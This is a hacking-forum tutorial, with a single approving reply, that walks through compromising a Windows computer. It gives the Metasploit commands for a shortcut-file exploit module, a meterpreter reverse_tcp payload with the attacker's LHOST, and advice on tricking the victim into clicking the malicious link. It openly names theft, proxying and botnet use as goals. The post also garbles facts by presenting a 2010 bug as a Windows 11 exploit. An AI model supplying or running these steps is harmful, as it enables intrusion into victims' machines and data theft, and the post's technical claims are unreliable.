Home Upgrade Search Memberlist Extras Hacker Tools Award Goals Help Wiki Contact

HF Rulez the UniverseHF Rulez the Universe
Proof
Am Yisrael Chai | Stand With Us
w11 windows

W11 Exploit

Posted Oct 26, 2023 06:56 AM
Windows 11 is now the most popular OS for desktop and laptop computers.
Cracking into a computer can be useful for a number of reasons: it can give you access to the rest of the network, you can use it as a proxy to hide your IP, you can steal valuable files/details, you can use it as part of a botnet to DOS, etc, and more.

The operating system itself has become quite secure, but numerous vulnerabilities can still be found in other programs installed like the browser, adobe reader, and office. Some other methods are covered in my other tutorials. The vulnerability we will exploit is one found in the way windows 11 handles shortcut files. You will notice that this tutorial is quite similar to there previous tutorials in my series. Lets begin.

1) Open Metasploit
You should be able to do this by yourself by now.

2) Select the Exploit
Microsoft has identified this vulnerability as MS10-045, it takes advantage of a buffer overflow in the shortcut dll. Use this command in Metasploit to load the exploit:
Code
Code
msf > use windows/ms10_045_shortcut_icon_dllloader

3) Configure the Exploit Options
The first option to set is the payload, and as before, we will use the meterpreter. this is an amazingly powerful payload which we can use to completely own their box.
Code
set PAYLOAD windows/meterpreter/reverse_tcp
Then we need to set the LHOST, which is the IP of our (the attackers) computer:
Code
Code
set LHOST 192.168.1.111

4) Run the exploit
As usual, just use the command:
Code
Code
exploit
And this will generate a link and a server to host that link.
Now we need the victim to click the malicious link!

5) Send the Link to the Victim
This will require a bit of social engineering to convince the user to click the link. Be creative, tell them it is the latest movie download site or the password to a locked RAR file. When the victim clicks the link, their security settings will probably prompt them to allow or deny the webpage access to windows explorer, and they must click allow.
When the victim clicks on the "Allow" prompt, Metasploit begins the process of establishing a client/server connection between you and the victim. This process is fairly slow, so be patient. It may not even work, but be patient and hope it does.

We will now have control of their computer through the meterpreter installed on their machine. Now you can go ahead and do almost anything you like.
Jan 20, 2024 06:18 AM
Pretty nice, good job on that one !